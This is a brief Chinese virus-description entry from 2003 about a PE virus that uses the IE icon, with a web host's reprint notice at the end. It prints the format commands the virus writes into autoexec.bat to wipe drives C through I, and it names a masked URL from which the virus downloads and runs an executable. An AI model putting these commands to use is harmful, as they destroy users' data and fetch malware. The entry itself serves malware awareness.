采用IE的图标,运行后向autoexec.bat中写入下列恶意代码
format d:/q/autotest/u
format e:/q/autotest/u
format f:/q/autotest/u
format g:/q/autotest/u
format h:/q/autotest/u
format i:/q/autotest/u
format c:/q/autotest/u
下载http://***www.websamba.com/hke2008/xxx.htm为本地c:\a1g .exe,并运行。
病毒的清除法: 使用光华反病毒软件,彻底删除。 病毒演示: 病毒FAQ: Windows下的PE病毒。
发现日期: 2003-12-10
文章整理:西部数码--专业提供域名注册、虚拟主机服务
http://www.west263.com
以上信息与文章正文是不可分割的一部分,如果您要转载本文章,请保留以上信息,谢谢!




